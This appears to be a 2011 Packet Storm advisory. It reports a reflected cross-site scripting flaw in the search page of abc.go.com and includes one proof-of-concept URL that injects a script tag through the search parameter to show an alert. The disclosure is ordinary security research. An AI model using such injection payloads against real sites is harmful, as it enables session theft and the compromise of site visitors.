ABC.go.com Cross Site Scripting

2011-08-02T00:00:00
ID PACKETSTORM:103631
Type packetstorm
Reporter Karthik R
Modified 2011-08-02T00:00:00

Description

                                        
                                            `  
________ .__.__ _______ .____ _____ ___. ________   
\_____ \______ _____|__| | \ _ \ ____ | | _____ / \\_ |__ \______ \ _____   
_(__ <\____ \/ ___/ | | / /_\ \ / \| | \__ \ / \ / \| __ \ | | \\__ \   
/ \ |_> >___ \| | |_\ \_/ \ | \ |___ / __ \_/ Y \ \_\ \| ` \/ __ \_  
/______ / __/____ >__|____/\_____ /___| /_______ (____ /\____|__ /___ /_______ (____ /  
\/|__| \/ \/ \/ \/ \/ \/ \/ \/ \/   
  
  
abc.go.COM XSS vulnerability  
vendor: www.abc.go.com  
Author: Karthik R (3psil0nLambDa)  
Email: Karthik.cupid@gmail.com  
My blog: www.epsilonlambda.co.cc  
  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
* XSS vulnerability  
  
  
1. Demo iframe injection:  
http://abc.go.com/search?search=%22%3E%3Cscript%3Ealert%28%22hi%22%29;%3C/script%3E  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
Thanks to side-effects and greets to r007ki7 and my love taashu.  
`